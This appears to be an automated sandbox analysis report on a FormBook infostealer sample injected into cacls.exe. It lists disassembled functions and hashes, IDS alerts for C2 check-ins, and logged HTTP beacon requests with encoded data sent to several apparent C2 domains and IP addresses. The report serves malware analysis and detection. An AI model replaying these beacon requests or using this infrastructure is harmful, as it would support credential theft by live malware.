Instruction ID: f02f41c7d4d6e17d040f1977c2903480c220fbc530be09a6559c61a34a0c4d2d
Opcode Fuzzy Hash: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
Instruction Fuzzy Hash: 12616DB0D05769CFEB20CF95D9587CEBAB2BB45308F1081C8D1583B281CBBA1A99CF55

Function 02DA04BE Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2556998440.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2da0000_cacls.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
Instruction ID: f993d6df797345efabdac848333e6e682b9b1851772e2c1a4fa79322bd627ac3
Opcode Fuzzy Hash: 720b3c8800e1a7a464067fd415588fc944cb1e4f28e4051148543ba0d3f05397
Instruction Fuzzy Hash: 2141F571618B0D4FD768AF689091BBAB3E2FB85301F50462DD98AC3352EB70DC46CB84

Function 0062E4AE Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
Instruction ID: 51828f79879051d523c10444c791c55c249ef735dd264babd756bab111baa64b
Opcode Fuzzy Hash: 73c36f96b271d319de1f77b8161072988f165ba7113a8b2cd342946c574b8194
Instruction Fuzzy Hash: 1C21F132715619DFC720CE28A8968F5FF75FF0261471402EED854DB642E317C82187C1

Function 02DADF2A Relevance: 56.5, Strings: 45, Instructions: 211COMMON

Download Yara Rule

Strings

@@@@, xrefs: 02DAE0AD
@@@@, xrefs: 02DAE0EC
@@@@, xrefs: 02DAE0DE
@@@@, xrefs: 02DAE060
@@@@, xrefs: 02DAE091
-./0, xrefs: 02DAE021
@@@@, xrefs: 02DAE0E5
@@@@, xrefs: 02DAE0C9
@@@@, xrefs: 02DAE09F
@@@@, xrefs: 02DAE036
@@@@, xrefs: 02DADFBF
%&'(, xrefs: 02DAE013
@@@@, xrefs: 02DAE0BB
@@@@, xrefs: 02DAE0C2
89:;, xrefs: 02DADFB1
@@@@, xrefs: 02DAE0D7
@@@@, xrefs: 02DAE10F
<=@@, xrefs: 02DADFB8
@@@@, xrefs: 02DAE04B
@@@@, xrefs: 02DAE0FA
@@@@, xrefs: 02DAE067
@@@@, xrefs: 02DAE075
@@@?, xrefs: 02DADFA3
@@@@, xrefs: 02DAE0A6
4567, xrefs: 02DADFAA
@@@@, xrefs: 02DAE06E
@@@@, xrefs: 02DAE0B4
@@@@, xrefs: 02DAE052
@@@@, xrefs: 02DADFF7
@@@@, xrefs: 02DAE0F3
@@@@, xrefs: 02DAE0D0
@@@@, xrefs: 02DAE101
123@, xrefs: 02DAE028
)*+,, xrefs: 02DAE01A
@@@@, xrefs: 02DAE03D
@@@@, xrefs: 02DAE02F
@@@@, xrefs: 02DAE08A
?, xrefs: 02DAE120
@@@@, xrefs: 02DAE108
@@@@, xrefs: 02DAE059
@@@@, xrefs: 02DAE07C
@@@@, xrefs: 02DAE083
@@@@, xrefs: 02DAE044
@@@@, xrefs: 02DAE098
!"#$, xrefs: 02DAE00C

Memory Dump Source

Source File: 00000006.00000002.2556998440.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2da0000_cacls.jbxd

Similarity

API ID:
String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
API String ID: 0-3558027158
Opcode ID: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
Instruction ID: 246257e717693f0c0873cf636090eb138e60cf92297fc99b08b2cf82a4f4ca4d
Opcode Fuzzy Hash: 6cdf6510e9a0c96c802cb82170c8c015373415e15c2748aa24174257426ba8d8
Instruction Fuzzy Hash: 39913FF04082948AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8945CB85

Function 02F82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02F8293C
___swprintf_l.LIBCMT ref: 02F8295E
___swprintf_l.LIBCMT ref: 02F829A3
___swprintf_l.LIBCMT ref: 02FBA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 02FBA54E
::%hs%u.%u.%u.%u, xrefs: 02FBA527
:%u.%u.%u.%u, xrefs: 02FBA5B8
ffff:, xrefs: 02FBA504

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
Instruction ID: e9e363058da3d5bd884f12bbee245893d92d202c8f64728c6ffae722ec52897d
Opcode Fuzzy Hash: f3aece3a3bf36df1a25d4ac8cc42d9fe5cdccd000006fe95f75360aa8b239ebb
Instruction Fuzzy Hash: 8851E8B6F00156BFDF11EB99889097EF7B8BF082807508169EA65D7641D734EE50CBE0

Function 02FF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02FF24A6
___swprintf_l.LIBCMT ref: 02FF24E2
___swprintf_l.LIBCMT ref: 02FF257D
___swprintf_l.LIBCMT ref: 02FF25A3
___swprintf_l.LIBCMT ref: 02FF25C8
___swprintf_l.LIBCMT ref: 02FF2608

Strings

:%u.%u.%u.%u, xrefs: 02FF25FF
ffff:, xrefs: 02FF247D, 02FF249D
::%hs%u.%u.%u.%u, xrefs: 02FF249E
::ffff:0:%u.%u.%u.%u, xrefs: 02FF24DA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: c2bce16dd7d474d8289ec5811b0e66ee2829c345607be81dd9809494f4b427b3
Instruction ID: 63a60ef714643e7c9c484e519b4a2b6044dfa007904f4a81db1d51b4117b8c2e
Opcode Fuzzy Hash: c2bce16dd7d474d8289ec5811b0e66ee2829c345607be81dd9809494f4b427b3
Instruction Fuzzy Hash: B6511371A00645AFDB70DF9CCDA097FB7F9AF44280B048459EB96C3651EBB4DA00CB60

Function 02F77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02FB4742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02FB46FC
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02FB4725
Execute=1, xrefs: 02FB4713
CLIENT(ntdll): Processing section info %ws..., xrefs: 02FB4787
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02FB4655
ExecuteOptions, xrefs: 02FB46A0

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
Instruction ID: ce0304fdc4108c4ad1296f23eace9bfac1bae1051653ece8575dd44306041683
Opcode Fuzzy Hash: 6a8805f0113cc687f5732729ab5f8f6af8ab4c67c5a79fdbef78d61f7b06da82
Instruction Fuzzy Hash: 2D512631A1021DBAEF11BAA4DC95FEAF7B9EF04384F1400AAD705A7181EB71AE45CF54

Function 03016940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 9a0f862ff2e96a86701fbc02e5a0eebc82d5344b2ce4abf8b9e1834128f72b12
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: B2021571609345AFC345DF18C890A6FBBE5EFC8700F048A2DF9959B264DB72E915CB42

Function 02F8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02F8B6BF

Strings

0, xrefs: 02F8B695
-, xrefs: 02F8B650
+, xrefs: 02F8B65A
0, xrefs: 02F8B66F

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 884e13bed912ca0278d54c787fe877dbe4d9454e2441ab52c7c6ee8b0c15bd94
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: ED81B170E052499EDF24EE68C891BFEFBB2AF4539CF18425ADA61E72D0C7349841CB54

Function 02FF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02FF214F
___swprintf_l.LIBCMT ref: 02FF2172

Strings

[, xrefs: 02FF212B
]:%u, xrefs: 02FF2169
%%%u, xrefs: 02FF2146

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 60bc740d138bcdaeed88bf746703a3f13f9a1151010245ed05e6b884c9540601
Instruction ID: 3e3ba9ccaaba7a97b8e8b9a77ba86a629dd296aa6673b97fbc9f5ecadf7d7869
Opcode Fuzzy Hash: 60bc740d138bcdaeed88bf746703a3f13f9a1151010245ed05e6b884c9540601
Instruction Fuzzy Hash: F3215176E00119ABEB50DE69CC40AEEB7E9AF44784F440156EF05E3210EB30D9018BA5

Function 02DA0388 Relevance: 7.6, Strings: 6, Instructions: 72COMMON

Download Yara Rule

Strings

|de, xrefs: 02DA03F7
|de, xrefs: 02DA03B6
|de, xrefs: 02DA043B, 02DA0443
|de, xrefs: 02DA03C4
|de, xrefs: 02DA03D2
|de, xrefs: 02DA03EF

Memory Dump Source

Source File: 00000006.00000002.2556998440.0000000002DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2da0000_cacls.jbxd

Similarity

API ID:
String ID: |de$|de$|de$|de$|de$|de
API String ID: 0-3287866246
Opcode ID: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
Instruction ID: 6758997b98ce347927908db7e3b84e10cc0f3e85667022ac306a110b014f3766
Opcode Fuzzy Hash: e6d338e7b14db9c33ec4048beedf938403ba15f5c62fb8eaccc9d8e066023ef1
Instruction Fuzzy Hash: D8215770918B4E8FCF80EFA8D885AEEBBB0FB59300F00851AD549E7221D7349645CB92

Function 02F6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02FB02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02FB02BD
RTL: Re-Waiting, xrefs: 02FB031E

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
Instruction ID: 7016dd89afe52f47fddd7a91e95590a8fcbc0a8f3c3a84d47920151a399664af
Opcode Fuzzy Hash: 230dcbbc30b24fa9050750148d47451cc9ea62c24fdf5bc2b45fdfb53c994531
Instruction Fuzzy Hash: 5BE1DE31A087419FD725CF28D888B6AB7E1FF85394F140A5DF6A68B6E0DB35D844CB42

Function 02F7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 02FB7BAC
RTL: Resource at %p, xrefs: 02FB7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02FB7B7F

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
Instruction ID: 2d48d9929a379c629eafbc509a3323eb6f92c464f537189e0225d18b86ac0bf1
Opcode Fuzzy Hash: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
Instruction Fuzzy Hash: 5641D3327047029FD720DE25CC40BAAF7E6EF86794F100A1EEA56DB680DB31E5058F91

Function 02F7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FB728C

Strings

RTL: Re-Waiting, xrefs: 02FB72C1
RTL: Resource at %p, xrefs: 02FB72A3
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02FB7294

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
Instruction ID: 252fab53c474429646705f6983251cc080fa57bb87518b44690848ab4f2dc14c
Opcode Fuzzy Hash: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
Instruction Fuzzy Hash: D3410732B00246ABD711EE25CD41BA6F7A5FF95794F140619FB55E7280DB31E841CBD0

Function 02FF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 02FF238D
___swprintf_l.LIBCMT ref: 02FF23B3

Strings

%%%u, xrefs: 02FF2384
]:%u, xrefs: 02FF23AA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: b763a21d66f5ca826112d75c1e31299bbc36d2844e8529206f5e59b15aa86c15
Instruction ID: 983b6b0bd57c88fe2c39b329eee44c2ce7dbce646d67a0e3900771c55eccc996
Opcode Fuzzy Hash: b763a21d66f5ca826112d75c1e31299bbc36d2844e8529206f5e59b15aa86c15
Instruction Fuzzy Hash: 91316672A006199FDB60DE29CC40BEEB7B9EF44694F444555EE49E3250EB30DA448FA0

Function 02F87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02F87E8B

Strings

+, xrefs: 02F87DE8
-, xrefs: 02F87DDD

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 982cf5030e74b2b8efe188a56dcb8a26dcaeb859998b72082ba7e68fcacfe992
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 2F91C679E0021A9BDF24FE6AC8807BEF7A5AF447E4F74451AEA55EB2C0D7309940CB50

Function 02F49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 02F49175
$, xrefs: 02F49191

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
Instruction ID: 3ae24f5ebde0846f8bc958911dbc3b211a9da7cf4b722fd2b06149679be6998e
Opcode Fuzzy Hash: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
Instruction Fuzzy Hash: EB811EB1E012699BDB25DF54CC54BEEB7B8AF48754F0041EAEA19B7280D7705E84CFA0

Function 02FCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 02FCCFBD

Strings

@, xrefs: 02FCCF0A
@4rw@4rw, xrefs: 02FCCFD5, 02FCCFDA, 02FCCFF1

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4rw@4rw
API String ID: 4062629308-2979693914
Opcode ID: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
Instruction ID: 379969c52047e3f8f57865bda9e57990503dc6d6e3020aa4f37cec3b4fe71b35
Opcode Fuzzy Hash: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
Instruction Fuzzy Hash: 4241BF71D00229DFCB21EF99C980A6EBBB9EF45B94F10406EEB14DB254E734D801CB64

Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h	6_2_00629E50
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then xor eax, eax	6_2_00629E50
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then pop edi	6_2_0062E4AE
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h	6_2_00629E46
Source: C:\Windows\SysWOW64\cacls.exe	Code function: 4x nop then mov ebx, 00000004h	6_2_02DA04BE

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49980 -> 74.208.236.156:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49988 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49984 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49992 -> 66.29.149.46:80

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 84.32.84.32 84.32.84.32

Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: ADVANTAGECOMUS ADVANTAGECOMUS
Source: Joe Sandbox View	ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /raea/?JHJt=itqtMr9H_JJ83L&nF=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp0E/jI7zxjpZO1XvGaBaxKF04Rir+eQ== HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /jytl/?nF=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4EtQbsAD1NVMwB3NTJxV3YfkG6sDZmQ==&JHJt=itqtMr9H_JJ83L HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /wb7v/?nF=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNPegpUt0XvvntMHYRmRLx72hcusnuxA==&JHJt=itqtMr9H_JJ83L HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
Source: global traffic	HTTP traffic detected: GET /r2k9/?nF=R82aEe+RY/7ruopLPiKRJqOVryxP2PLUuvMRSLNb4ss61aauImbQUdGg0t6KhpFZbU646xYhPfN8HrEmx58z7XbG+3k9TZnvIg3pQBIzBI2XOfShgg==&JHJt=itqtMr9H_JJ83L HTTP/1.1Accept: /Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.christinascuties.net
Source: global traffic	DNS traffic detected: DNS query: www.techmiseajour.net
Source: global traffic	DNS traffic detected: DNS query: www.aktmarket.xyz
Source: global traffic	DNS traffic detected: DNS query: www.golivenow.live
